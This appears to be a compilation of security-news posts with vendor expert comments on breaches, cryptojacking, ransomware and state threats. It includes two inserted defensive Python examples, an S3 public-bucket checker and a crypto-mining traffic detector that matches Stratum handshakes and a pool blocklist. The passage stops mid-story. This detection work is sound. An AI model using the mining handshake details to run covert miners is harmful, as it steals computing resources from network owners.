Author Archives: Security Experts

More Than 80 UK Manufacturing Plants Hit By Cyber Attacks

The ISBuzz Post: This Post More Than 80 UK Manufacturing Plants Hit By Cyber Attacks appeared first on Information Security Buzz.

The UK has already suffered stealth cyber attacks on more than 80 manufacturing plants, with criminals deploying tactics that could put critical national infrastructure at risk. In an anonymous survey of manufacturers, almost half admitted that they have fallen prey to cyber warfare, according to trade group EEF. IT security experts commented below.

Tim Erlin, VP at Tripwire:

“It’s important to distinguish between cyberattacks on manufacturers and cyberattacks on industrial control systems. While they may be related, they’re not the same thing. Any organization with connected computer systems may fall victim to cyberattacks across a broad spectrum of technologies, but attacks on the systems that control a manufacturing plant floor are much more specific. Of course, manufacturing isn’t the only industry using industrial control systems.

We have seen a rise in attacks on control systems themselves, and the impact to the business of these attacks can be very direct. At the same time, cyberattacks in general continue to plague organizations around the globe.”

David Emm, Principal Security Researcher at Kaspersky Lab:

“The world isn’t ready for cyber-attacks against critical infrastructure, but attackers are clearly ready and able to launch attacks on these facilities – as this trend towards attacks on the manufacturing sector shows.

We’ve seen attacks on power grids, oil refineries, steel plants, financial infrastructure, seaports and hospitals – cases where organisations have spotted attacks and acknowledged them. However, many more companies do neither, and the lack of reporting of these attacks hampers risk assessment and response to the threat. Security must be tailored to the specific needs of each organisation and be seen as an ongoing process. This is true also of the human dimension – tricking people into taking action that launches the initial exploit is as common in attacks on such facilities as it is in any other attack.”

Data Firm Left 48 Million Data Profiles Exposed On AWS Server

The ISBuzz Post: This Post Data Firm Left 48 Million Data Profiles Exposed On AWS Server appeared first on Information Security Buzz.

LocalBlox, a company that scrapes data from public web profiles, has left the details of over 48 million users on a publicly accessible Amazon Web Services (AWS) S3 bucket. IT security experts commented below.

Christopher Littlejohns, EMEA Engineer at Synopsys:

“Whilst this data breach has strong similarities to multiple other AWS misconfiguration issues that resulted in data breaches, and the data was “publicly available”, the data captured was interesting in that it consolidated personal information scraped from thousands of web sites. The net result is that it made it easy for an attacker to gain access to a pool of data that would be valuable for subsequent social engineering attacks, account hacking and identity fraud. Any company that collects, consolidates, but does not adequately secure such data is essentially exposing people to higher risk of being targeted. They therefore have an even stronger duty of care as they are effectively creating developed intelligence on people that can be used for criminal purposes.”

Javvad Malik, Security Advocate at AlienVault:

“Massive breaches through unsecured AWS S3 buckets continue to be a troubling trend. While cloud providers take care of certain aspects of security, it is imperative that organisations ensure they are doing their part to ensure the security of data that is uploaded. As with other aspects of security, cloud environments need to be continually monitored and the security assessed. Otherwise organizations have no assurance as to whether the data is secure or not, and can be left exposed for long periods of time.”
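The misconfiguration behind this story is a bucket policy or ACL that grants read access to everyone. The following offline checker is an added example (not code from the post, from AWS, or from any vendor named here): it evaluates a bucket policy and a bucket ACL in the JSON shapes the S3 GetBucketPolicy and GetBucketAcl APIs return and reports every world-readable grant, so a monitoring job can alert on the weak setting instead of discovering it from a breach. Bucket names, account ids and the role ARN in the samples are constructed.

```python
"""Offline check for the world-readable S3 bucket misconfiguration discussed above.

Added example, not taken from the original post or any vendor's tooling.
All sample policies and ACLs below are constructed for illustration.
"""
import json
from fnmatch import fnmatch

# Canned ACL groups that mean "everyone" (AuthenticatedUsers = any AWS account at all).
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# Actions that expose bucket contents; statement wildcards are matched against these.
READ_ACTIONS = ("s3:getobject", "s3:listbucket")


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal):
    """True for Principal "*" or {"AWS": "*"} (or an AWS list containing "*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def _grants_read(action_patterns):
    """True if any action pattern (e.g. "s3:*", "s3:Get*") covers a read action."""
    return any(fnmatch(read, pattern.lower())
               for pattern in action_patterns for read in READ_ACTIONS)


def public_policy_findings(policy_json):
    """One finding per Allow statement that lets everyone read the bucket.

    Statements with a Condition block are still reported, marked conditional,
    so a reviewer checks the condition instead of trusting it blindly.
    """
    policy = json.loads(policy_json)
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_everyone(stmt.get("Principal")):
            continue
        if not _grants_read(_as_list(stmt.get("Action"))):
            continue
        findings.append({"sid": stmt.get("Sid", f"statement[{idx}]"),
                         "resource": _as_list(stmt.get("Resource")),
                         "conditional": "Condition" in stmt})
    return findings


def public_acl_findings(acl):
    """Grants to AllUsers/AuthenticatedUsers that allow reading the bucket."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            if grant.get("Permission") in ("READ", "FULL_CONTROL"):
                findings.append({"group": grantee["URI"].rsplit("/", 1)[-1],
                                 "permission": grant["Permission"]})
    return findings


def is_publicly_readable(policy_json, acl):
    """Single verdict a continuous-monitoring job can alert on."""
    return bool(public_policy_findings(policy_json) or public_acl_findings(acl))


# Setting that should accompany the fix: S3 Block Public Access rejects public
# ACLs and policies before they apply (real PublicAccessBlockConfiguration keys).
BLOCK_PUBLIC_ACCESS = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                       "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

# Constructed sample: the classic "make the whole bucket readable" policy.
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
    "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-profiles/*"}]})
# Constructed sample: the same bucket scoped to one IAM role, no public grant.
PRIVATE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "AppRoleRead", "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:role/profile-ingest"},
    "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-profiles/*"}]})
# Constructed ACLs: one with an AllUsers READ grant, one owner-only.
EXPOSED_ACL = {"Grants": [{"Grantee": {"Type": "Group",
               "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
               "Permission": "READ"}]}
PRIVATE_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
               "Permission": "FULL_CONTROL"}]}

if __name__ == "__main__":
    for name, pol, acl in (("exposed", EXPOSED_POLICY, EXPOSED_ACL),
                           ("private", PRIVATE_POLICY, PRIVATE_ACL)):
        print(name, is_publicly_readable(pol, acl),
              public_policy_findings(pol), public_acl_findings(acl))
```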

TaskRabbit Takes Down App And Website After Getting Hacked

The ISBuzz Post: This Post TaskRabbit Takes Down App And Website After Getting Hacked appeared first on Information Security Buzz.

TaskRabbit, a web-based service that connects freelance handymen with clients in various local US markets, has emailed customers admitting it suffered a security breach. The company has taken down its app and website while law enforcement and a private cyber-security firm are investigating the incident. IT security experts commented below.

Tim Helming, Director of Product Management at DomainTools: 

“This is an indication of how comprehensively nefarious actors can interfere with business functions – and potentially harm users. To take control of a website and expose such trusted resources as TaskRabbit’s GitHub repository, as well as daily transaction volumes and information regarding employees, the threat actors must have had comprehensive access to the network. While we don’t yet know the specifics of how this attack unfolded, it is a good reminder of the importance of practices such as least-privilege access controls, robust network segmentation, and strong phishing controls. Organizations need to take cybersecurity seriously, particularly when it could affect the livelihood, reputation and privacy of both employees and service users.”

Bob Egner, VP at Outpost 24:

“This attack happened because the TaskRabbit data is an interesting and valuable asset. Attacks of this nature are attempted when there is a potential gain for the attacker – in this case, to monetize any personal information that can be obtained. All web applications are vulnerable, it’s only a matter of how much effort the attacker is required to expend. It’s really an economic problem where the payback has to be larger than the expended effort.

Any public facing web application that holds large amounts of personal information should have a comprehensive application security testing program in place to assess the application, its data stores, the infrastructure on which it runs, and the users assigned to manage and operate the overall system. Any weaknesses should be remediated in a prioritized way so that the potential for attack is reduced to the lowest possible level and maintained there. The focus should be on the economic equation, where the effort required to compromise the system is much greater than the value of any stolen information.”

Paul Edon, Director at Tripwire:

“The TaskRabbit hack is an unfortunate reminder of why phishing is a popular attack method as it targets human naivety. Individuals must show extreme caution to all links and attachments sent to them and have the mindset that if it looks too good to be true, then avoid it at all costs. Organisations also have a role to play in reducing the threat posed by such attacks. Take a proactive step by implementing security services that offer anti-phishing services as well as introduce training for employees to understand the consequences of clicking unknown emails. Hackers are constantly developing new tricks to dupe unsuspecting users, so organisations must adopt a pro-active stance to help reduce the threat.”

Rob Tate, Security Researcher at WhiteHat Security:

“TaskRabbit is a great example of how small businesses can thrive thanks to the popularity and widespread use of apps in today’s modern world, and consumers can find services in just a few clicks. To stay ahead of the game in terms of usability and enhanced features, apps are continuously being updated. Although this is beneficial to both businesses and consumers, security must not be an afterthought and needs to be an integral part of the build process.

At WhiteHat, we are seeing practices such as DevSecOps become increasingly popular as organizations and businesses of all sizes look to focus efforts on securing their applications, but a lot more still needs to be done to achieve the security required. Because a security breach could reflect poorly on the acquiring company, there are key areas that could make your organization vulnerable to a breach, and they are often overlooked.

For example, it’s critical that the company being acquired take the proper measures to build security into their development practice, and that due diligence on the security of acquisitions of big software programs or cloud services be done. The same holds true for open source software or libraries that are being brought into your company’s development organization.

Companies should always first assume the service/application is not secure, and then apply security best practices to make sure it becomes secure as they use it to build apps or services.

Security is also important for consumers. There are some simple steps they can take to help secure themselves online:

  1. Don’t use the same password for all sites and apps. If one site or app is breached, all of your accounts are effectively breached. At the very least, use a variety of passwords to minimize the impact.
  2. Turn on two-factor authentication for any app that supports it. It can be a pain, yes, but it’s also one of the best ways to protect your accounts.”

Russian Cyber Threat

The ISBuzz Post: This Post Russian Cyber Threat appeared first on Information Security Buzz.

Days after the missile strike on Syria, GCHQ and the FBI have warned of a potential retaliation by Russia – in the form of a cyber attack. The NCSC is on high alert and concern is growing among executives who fear severe disruption of critical infrastructure. IT security experts commented below.

Bill Conner, CEO at SonicWall:

“Cyber attacks like WannaCry and Not-Petya demonstrate governments can, and will, use nefarious means to target critical national infrastructure of nation states. There is no doubt that Russia has the ability and the motive to deploy this kind of attack on the West. Many other nation states have this ability too. That said, it is not just national infrastructure at risk. For many state-sponsored hackers, business and governmental department disruption is top of the agenda, much like the NHS attack.”

“As the cyber-arms race continues to escalate, there is increasing pressure on the US and UK governments to truly understand the nature of malware cocktails – the process of mixing threats to concoct brand new, destructive attacks. The risks to businesses and even everyday citizens’ data grow each day. Governments and businesses need to deploy a layered security approach utilizing next generation firewalls, deep packet inspection for encrypted communication, cloud-based multi-engine cloud sandboxing, advanced real-time deep memory inspection, and next generation end-point security with rollback capability.”

Matt Walmsley, EMEA Director at Vectra:

“With stories reporting routers in the USA and UK being compromised by foreign nation states, and a recent increase in security preparation for possible large scale cyber-attacks, enterprises should take another look at how they’re securing their network infrastructure.

Don’t leave the door wide open – No software is perfect so make sure you’re up-to-date with software updates and patches for your network infrastructure. Then make sure you’re not exposing your equipment’s management interfaces and ensure you have changed the default admin credentials. For perimeter devices with internet connectivity this is doubly important. This may seem like “cybersecurity 101” advice but, only last month, default settings in some Cisco switches allowed over 168,000 devices exposed to the internet to be identified as vulnerable to illicit remote command execution via an admin protocol.

Your firmware may not be that firm – Advanced attackers will seek to compromise the underlying firmware of their target platform. Even if you have robust OS level security controls, threats such as Sub-OS rootkits will remain undetected. However, with recent advances in AI-based behaviour threat detection we can now spot in real-time the very subtle signals attackers use to perform command & control (C2) orchestration to devices that have compromised firmware by looking for the attacker’s “knocking” signals hidden within legitimate communications. With that actionable insight, platforms can be completely reset and their firmware, OS images, and configs reloaded from known good sources.”

‘Lazy Hackers’ Turn To Automated Attack Tools

The ISBuzz Post: This Post ‘Lazy Hackers’ Turn To Automated Attack Tools appeared first on Information Security Buzz.

The BBC today ran a story covering how cyber-attackers are now turning to tools that automate the process of finding and hijacking vulnerable servers. The study used a fake server known as a honeypot to log everything done to it by digital intruders. Put online by security firm Cybereason, the server was quickly found and hijacked in seconds by a bot that broke through its digital defences.

To make the fake server look more convincing, Cybereason thought up a company name, generated staff identities and spoofed network traffic. This helped it pass the “sniff test” and convince bots it was a target that was worth their attention. About two hours after the server for the fake finance firm was put online it was found by a bot which then aggressively set about taking it over. Passwords to protect some of the server’s functions were left intentionally weak to tempt the bot which duly cracked them and then went on to plunder information on the machine. IT security experts commented below.

Oliver Pinson-Roxburgh, EMEA Director at Alert Logic:

“Alert Logic did some research on AutoSploit, a new tool that automatically looks for assets to hack on the internet, and then automatically hacks the systems. Our research was to see if this new tool generated interest in the hacker community. We would have expected to see an increase in attacks against our customers generally due to its release, and while we haven’t quantified what impact this might have had, we have at least a supposition that it would increase attacks.

I am not surprised that organisations are starting to see this behaviour. It’s likely due to attackers using miners more and more as a way to monetise attacks. We see the miner malware automatically looking to identify other miners in the environment and shut the current hackers down in order to spin up their own systems. They are also looking to stay persistent for as long as possible in an asset, as controls on the cryptocurrency side start to improve ways to detect what a valid miner looks like.”

Sammy Migues, Principal Scientist at Synopsys:

 “In my day, a “hacker” was someone who would spend two hours coding up some elegant script so that they wouldn’t ever have to do 10 minutes of tedious labour ever again. Even though “hacker” is “attacker” now, the mindset hasn’t changed. Only a person incapable of actual hacking (such as writing clever scripts) would ever do all those steps manually and that person is probably not an attacker to be feared.

In theory, time is on the organisation’s side and their brilliant and comprehensive logging and attack management would catch the breach by the second or third step. When it’s automated, the entire attack might occur within the window that their logging and SIEM can turn data into knowledge into calls to action.

If your electronic “attack surface” has one or more vulnerabilities that are known long enough for someone to string together multiple exploits into one bot that still works, then you’ve made an error in how you prioritize repairs, or in asset management, or something like that.

So, yes, someone “weaponised” a set of attacks into something a great many less capable “attackers” can use. Hello, 1988 called and they want their Morris Worm back. Zero-days aside, by the time this happens, you probably should have patched. Considering the chain of exploits required here (for this purposely vulnerable honeypot), when that exists for real, it’s almost always because someone isn’t keeping up with the risk management, which would drive their patching, firewalling, WAFing, and so on. This is not victim blaming. There’s a reason why we inspect cars and keep the unsafe ones off the road…haven’t quite figured out how to do that with a lot of drivers, however.

So, why do attackers lick their chops and run their bots? Because they can…”

Kelvin Murray, Senior Threat Research Analyst at Webroot:

“Hackers always look at the latest technology. Automation technologies are changing the game for attackers, allowing them to mount more complex and sophisticated attacks at scale in seconds. Although it will take many years before hackers employ powerful AI to inflict damage upon systems and services autonomously, smart programming and even machine learning can be more readily weaponised in the medium term. These attackers appear to have successfully removed the human labour required to complete a successful breach, using a bot to identify and attack a decoy – which is worrying news.

“Cyber criminals largely operate a numbers game. More attempts to access data or capture information fundamentally translates to an increased likelihood of successfully making money. It really is no surprise that the more tedious aspects of stealing from a business have been automated. Completely taking over a business without secured RDP is very easy to do and to implement this in code wouldn’t be tough. We recommend securing your endpoints against RDP breaches immediately. Proper password policy is of course something that would also protect against these kind of attacks. A combination of an intelligent approach to security and the latest defence technologies will help organisations stay one step ahead of the bad guys – even if they are automating their attacks.”

Threat Of Russian Cyber Attack

The ISBuzz Post: This Post Threat Of Russian Cyber Attack appeared first on Information Security Buzz.

Russian hackers are targeting millions of devices around the world to spy, steal information and build networks for potentially devastating future cyberattacks. IT security experts commented below.

Gavin Millard, Technical Director at Tenable:

“Irrelevant of who the threat actors are or their motivations, the existence of an easily exploited vulnerability on critical infrastructure connected to the internet should be addressed immediately. As stated in the technical alert, if a threat actor can gain privileged access to a router, the options for further exploitation are endless.

“It’s important to note, even though the recently disclosed Cisco Smart Install vulnerability doesn’t affect routers, unfortunately there are over 100,000 switches that could be vulnerable currently exposed to the internet. Similar to MS17-10, the vulnerability in SMBv1 leveraged for the global Wannacry attack, these flaws affect protocols that should never be exposed to the internet but frequently are due to a lack of basic security hygiene.

“Owners and operators of MOXA EDR-810 industrial routers, frequently deployed to secure highly critical environments, should take particular note of this advisory as a slew of recently disclosed vulnerabilities could lead to many of the issues outlined.

“The guide from the joint task force includes some good best practices that should be enforced to reduce the chance of a router falling under the control of an attacker, irrelevant of their country of origin or motivation. Continuous visibility of what corporate systems are exposed to the internet, how well they are configured against security best practices (CIS or NIST for example), and whether they are affected by any known vulnerabilities should be part of every robust security program.”

Anthony Chadd, Senior Director, EMEA at Neustar:

“Today’s warnings regarding the Russian hacking offensive, which highlight the probability of Kremlin-backed cyber-experts sitting invisibly on networks with the hope of collecting information, should come as no surprise.

“We are already aware that the Russians are armed with the vast capabilities, resources and motives to steal classified information from governments, and are able to unleash disruption to key industries globally. But today’s news highlights the increasing intensity of the Russian offensive, as it has been revealed that Kremlin cyber-experts have been proactively targeting routers in British homes, scanning for weaknesses such as obvious passwords and expired anti-virus software.

“With such an obvious imposition on US and UK security, it is of the greatest importance that the push for key industries to strengthen their cyber-defences is put in place – fast. This includes deploying efficient technologies and ensuring key processes are up to scratch. However, these marching orders should not just apply to the government, but also society as a whole. Every citizen should be proactive in their own cyber-defence, but US and UK governments must make educating the general public a priority, reinforcing the necessity for effective usernames and passwords to prevent their data getting into the wrong hands.

“Beyond that, in order to be proactive in their cyber defences, both citizens and businesses should be aware of the importance of securing any IoT technologies, which is considered to be a crucial first point of defence. This involves ensuring that the proper procedures are in place and that anti-virus software in every device is updated frequently.”

Ross Rustici, Senior Director of Intelligence Services at Cybereason:

“Although tensions with Russia are at an all-time high, the threat of retaliatory cyber-attacks against the UK and its allies is overblown.

“We are likely to see increased disinformation campaigns and some low-level activity by apparently independent groups, but nothing that breaks Russia’s usual plausible deniability. We may also see some cyber activity within the Syrian theatre, such as jamming communications, but nothing which targets nations directly.

“An unconcealed, high-level attack on UK infrastructure such as a powerplant would cross a red line into open warfare. Russia’s failure to interfere with the airstrike itself indicates that Putin is not yet ready to escalate and risk a war breaking out. Nobody wants to see these nuclear powers go toe-to-toe in a real conflict.”

Crypto-Mining Corporate Networks

The ISBuzz Post: This Post Crypto-Mining Corporate Networks appeared first on Information Security Buzz.

The volume of crypto-mining transactions has grown, spiking almost 500% on corporate networks. Zscaler has blocked more than 2.5 billion crypto-mining attempts in the last six months. The spike, the firm said, is likely tied to the sharp increase in value of cryptocurrency (Bitcoin hit highs above $19,000 in December) and the fact that legitimate sites are adopting crypto-mining as a source of revenue instead of online advertisements. IT security experts commented below.

Itsik Mantin, Lead Scientist at Imperva:

“The impact of the crypto-madness on cybersecurity has two faces. The first is specific to the crypto-finance industry, which turned into a very tempting target for penetration, wallet hijacking and fake transactions. However, the impact of the second – using hijacked hosts of all kinds as platforms for crypto-mining – reaches practically everywhere. From web browsers unknowingly mining coins for the site they’re visiting, to websites that suffer code injection attempts due to attackers looking for powerful hosts for digging their gold. The cyber-monetization – the path from hack to money, is shorter today than ever before.”

Bob Noel, Director of Strategic Relationships and Marketing at Plixer:

“Cryptocurrency mining is a theft of CPU resources from the business. Web site response times are critical to customer satisfaction and retention, and companies spend millions of dollars on robust infrastructure to achieve that goal. Cryptocurrency mining steals CPU cycles from that infrastructure, negatively affecting the customer experience, potentially costing the business millions of dollars. It is important that organizations implement mechanisms to know when they have been infected. One way to do that is with software agents looking for unusual processes that consume CPU cycles. Another is to utilize network traffic analysis (NTA). CPU cycles are being used to answer math problems, and for the cybercriminals to monetize this, data must be sent across the internet to their servers. NTA provides a mechanism to scrutinize this traffic, looking for data, even a single packet, being sent to cybercriminal domains. If any of this traffic is seen, an immediate notification is sent to the security operations team alerting them to the crypto-mining in progress. They are able to remove it, and protect the business and more importantly, the customer experience.”
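The network traffic analysis approach described above comes down to two checks on outbound connections: contact with a known mining-pool destination, and the mining protocol handshake itself, which identifies a miner even when the pool host is not yet on any blocklist. The detector below is an added example (not code from the post or from Plixer): it runs both checks over constructed flow records that carry the first payload bytes of each connection, and raises an alert on a single matching flow. The blocklist hosts, addresses and wallet string are constructed placeholders; the Stratum method names are the real ones used by the mining.* and Monero-style login variants of the protocol.

```python
"""NTA-style detection of crypto-mining traffic, as described above.

Added example, not from the original post or any vendor's product. Scans flow
records (with first payload bytes) and flags (1) contact with a known mining
pool host and (2) a Stratum mining-protocol handshake to any host.
Blocklist entries and flow records are constructed for illustration.
"""
import json
from collections import namedtuple

Flow = namedtuple("Flow", "src dst dport payload")

# Constructed placeholder blocklist; a real deployment feeds this from threat intel.
MINING_POOL_HOSTS = {"pool.example-xmr.invalid", "stratum.example-pool.invalid"}

# First client message of a classic Stratum session is one of these JSON-RPC calls.
STRATUM_MINING_METHODS = ("mining.subscribe", "mining.authorize", "mining.submit")


def _stratum_method(payload):
    """Return the Stratum method if the payload's first line is a mining request.

    Monero-style Stratum uses a generic "login" method, so it is only accepted
    when the params carry the wallet ("login") and "pass" fields; that keeps an
    application's own JSON "login" call from being mistaken for a miner.
    """
    first_line = payload.split(b"\n", 1)[0]
    try:
        msg = json.loads(first_line)
    except ValueError:          # not JSON at all (TLS, binary, plain text)
        return None
    if not isinstance(msg, dict):
        return None
    method, params = msg.get("method"), msg.get("params")
    if method in STRATUM_MINING_METHODS:
        return method
    if method == "login" and isinstance(params, dict) and {"login", "pass"} <= params.keys():
        return method
    return None


def _is_pool_host(host):
    """Exact or subdomain match against the blocklist, case-insensitive."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in MINING_POOL_HOSTS)


def detect_mining(flows):
    """One alert per offending flow; a single flow is enough to alert."""
    alerts = []
    for f in flows:
        reasons = []
        if _is_pool_host(f.dst):
            reasons.append("destination on mining-pool blocklist")
        method = _stratum_method(f.payload)
        if method:
            reasons.append(f"Stratum handshake ({method})")
        if reasons:
            alerts.append({"src": f.src, "dst": f.dst, "dport": f.dport,
                           "reasons": reasons})
    return alerts


# Constructed flow records: ordinary TLS, a Monero-style login to a listed pool,
# a classic Stratum subscribe to an unlisted address, and a benign app login.
SAMPLE_FLOWS = [
    Flow("10.0.4.17", "www.example.com", 443, b"\x16\x03\x01\x02\x00"),
    Flow("10.0.4.17", "pool.example-xmr.invalid", 3333,
         b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4WALLETPLACEHOLDER",'
         b'"pass":"x","agent":"XMRig/2.5.2"}}\n'),
    Flow("10.0.9.2", "203.0.113.44", 14444,
         b'{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}\n'),
    Flow("10.0.9.2", "api.internal.example", 8080,
         b'{"method":"login","params":{"user":"bob"}}'),
]

if __name__ == "__main__":
    for alert in detect_mining(SAMPLE_FLOWS):
        print(alert)
```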

Nadav Avital, Security Researcher at Imperva:

“The latest research we conducted at Imperva shows a clear bias towards crypto-mining attacks. In fact, 90% of all remote code execution attacks towards servers involve illegal crypto-mining activities. Also, since the reward is immediate, i.e. the money goes straight into the attacker’s wallet, we have seen a development in crypto-mining attacks – from simple scripts, to state sponsored exploits like EternalBlue that are weaponized with crypto-mining payloads.”


Andy Norton, Director of Threat Intelligence at Lastline:

“The spike in traffic has nothing to do with Bitcoin’s value. It has everything to do with Monero, a general CPU friendly fungible currency creating a market for services like Coinhive to be injected onto websites, and usurp visiting browsers to mine XMR currency. The fact is that exploits are much harder to develop these days, so cryptojacking payloads offer a greater return on investment.”

Ransomware Still A Top Cybersecurity Threat

The ISBuzz Post: This Post Ransomware Still A Top Cybersecurity Threat appeared first on Information Security Buzz.

A new report by Verizon revealed that ransomware is the most common type of malware, found in 39 percent of malware-related data breaches – double that of last year’s DBIR – and accounts for over 700 incidents. What’s more, Verizon’s analysis shows that attacks are now moving into business critical systems, encrypting file servers or databases, inflicting more damage and commanding bigger ransom requests. IT security experts commented below.

Chris Day, Chief Cybersecurity Officer at Cyxtera:

“Cybercrime is profitable and hard to prosecute. Potential pay-outs can reach millions of dollars yet criminals operate in near anonymity. Even if a cybercriminal is prosecuted, which is rare, extradition is even less common. For criminally-minded groups, there is far less chance of getting ‘caught’ in the cyber realm than in traditional criminal pursuits.

“Ransomware attacks will likely continue to plague us for some time because they require little effort. Cyber criminals only need access to pedestrian tools to carry out an attack. Cryptomining, on the other hand, requires enormous amounts of expensive compute power to pull off. That’s why we see rising numbers of attacks where the target is processing power.”

Ricardo Villadiego, CEO at Cyxtera Business:

“The reason why we are seeing more phishing than ever before is simple: they still work very well. Because they appeal to the curiosity of the human, using clever social engineering tactics, they are still very successful. In addition, attackers use more advanced techniques, making it harder for humans to spot the attacks, which is why security standards like DMARC can make a big difference.

“Organizations will not be able to mitigate phishing attacks if they focus on fraud losses exclusively. Their protection strategy needs to be comprehensive in nature and phishing is the beginning of many fraud schemes and data breaches. Fraud losses are the consequence. As we work with more than 3,500 organizations around the world, we see that relentless and comprehensive monitoring of internet threats becomes very effective. You don’t need to make it impossible for cybercriminals to impersonate you – just expensive, inefficient and unprofitable, as they normally go for easy targets.”

Sean Newman, Director at Corero Network Security: 

“Whilst other vendors offer different perspectives on the DDoS threat landscape, Verizon’s most recent Data Breach Investigation Report closely aligns with what we are seeing at Corero – DDoS attacks are not diminishing in quantity and they are not generally as large as most might expect. However, they are equally as damaging!

“Although DDoS is not in the news every day, Verizon reported 21,409 attacks over the past year – almost 60 a day. Corero DDoS research, looking at a larger sample size of more than 100,000 attacks per year, observed similar patterns. In fact, many attacks are now coming from cybercriminals who are financially motivated. Therefore, it’s no surprise that most attacks are reported against the Finance, Insurance and Retail industries. For online companies where it is critical to have 100% uptime, DDoS technology which can detect and automatically mitigate attacks, in real-time, should now be a must-have requirement.”

Government Launches New Cybersecurity Centre At London’s Olympic Park

The ISBuzz Post: This Post Government Launches New Cybersecurity Centre At London’s Olympic Park appeared first on Information Security Buzz.

Following news that the Government is launching a new cybersecurity centre at London’s Olympic Park, the Government hopes the new centre will be a catalyst for a growing tech cluster and could help create 2,000 UK jobs in cybersecurity. IT security experts commented below.

Paul Farrington, Director, EMEA Solution Architects at CA Veracode:

“We are pleased to see the Government continuing to invest in cybersecurity skills in the UK. With news today that cyberattacks against UK organisations are at an all-time high, the need for greater expertise will be crucial in securing the nation’s data and services. However, it is important that industry doesn’t see the cyber skills gap as the Government’s problem to solve – especially as we see security becoming an increasingly prominent part of other technology roles.

In software development, for example, in 44% of organisations, the development team are responsible for the maintenance of third-party commercial and open source components. This suggests a move in responsibility for the ongoing management of security vulnerabilities, such as the Apache Struts2 vulnerability that led to the Equifax mega-breach. Even as we’re seeing this shift, our research has also shown that 70% of developers were not required to complete any courses focused on security when getting their degree. It is crucial that organisations invest in improving the skills of their employees to assure the security of their services and solutions. Providing eLearning can improve security standards by an average of 19%, for example. Improving the nation’s cyber hygiene is a collaborative effort, and those companies that rely solely on the Government’s investment will find themselves burnt.”

Neil Thacker, CISO EMEA at Netskope:

“This move from the British government shines a spotlight on the dangers of the digital underworld today.  Cracking down on the dark web is the right step forward, however criminals are smart and the dark web is not the only hiding ground for them.  There are many access points and techniques used by criminals to conceal their activities, including the public web, where stolen personal data and financial information can be traded.  Policy will help to some extent, but the onus is on businesses and individuals to look at their practices and implement intelligent controls that can lead to identifying these illegal activities.”

André Stewart, VP EMEA at Netskope:

“Cybersecurity is big business and as we all now know it can have huge consequences, which is why cyber criminals and governments take it so seriously. While it’s great to see cybersecurity is front of mind, the amount of investment is a bit like buying a spud gun to battle a bazooka. Much more needs to be done as businesses continue to fall short of the mark in protecting themselves, often rooted in legacy and traditional security practices that fail to fully protect them and their data. The announcement of this new cyber-innovation centre should spur businesses into reviewing their practices and cybersecurity resources, stripping away antiquated practices and making sure they are up to the challenges and the risks of today’s digital world.”


YouTube Hacked

The ISBuzz Post: This Post YouTube Hacked appeared first on Information Security Buzz.

It has been reported that the popular video streaming service YouTube has been hacked, with the video for Despacito defaced and more than a dozen other artists, including Shakira, Selena Gomez, Drake and Taylor Swift, also affected. The original clips had been posted by Vevo. Despacito has been removed, but its cover image had been changed to show a group of people wearing masks and pointing guns. The hackers, calling themselves Prosox and Kuroi’sh, had written “Free Palestine” underneath the videos. Several of the clips remained live at the time of writing. IT security experts commented below.

Mark James, Security Specialist at ESET:

“The details currently are sparse so trying to figure out what they did or how they did it is not something that’s easily done. The problem with these types of hacks is the potential for damage caused. For YouTube it’s a brand and PR issue.  For the artists it’s the personal damage of their brand being used for nefarious purposes.

Some YouTube videos collect hundreds of thousands or indeed millions of views. The ability to push information to all those viewers is massive and in some cases we could even see actions to trick the user into going to websites or following links.

For the end user it’s about having the security measures in place in case you are involved in a phishing attack or online scam. This means utilising a good multi-layered internet security product and applying awareness when browsing web pages or clicking any links associated with the internet. The end user may be influenced by the information they see; if they trust the digital persona, like a pop star or “YouTuber”, they may be more likely to be scammed or tricked into going somewhere that may be malicious.”

Lee Munson, Security Researcher at Comparitech:

“The recent hack of popular music clips on YouTube seems to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

In that respect, then, it is in itself nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”


Delta Cyberattack Exposes Customer Credit Card Details

The ISBuzz Post: This Post Delta Cyberattack Exposes Customer Credit Card Details appeared first on Information Security Buzz.

It has been revealed that the cyberattack the American airline Delta suffered last year may have exposed customer payment information. The airline said the incident involved [24], a chat-services provider used by Delta and other companies. Delta says only “a small subset” of customers were affected, with payment information exposed from Sept. 26 to Oct. IT security experts commented below.

Martin Jartelius, CSO at Outpost24:

How should Delta handle the breach?

As this relates to a PCI certified environment, the task of forensic investigation is with the card brands. The important part now is to handle the customer relations with transparency, and also to review the trusts between their own organization and their service providers.

As there is a known period the breach occurred, it is of course of importance to find out how it was possible for it to occur and how to prevent it from recurring.

What should customers do?

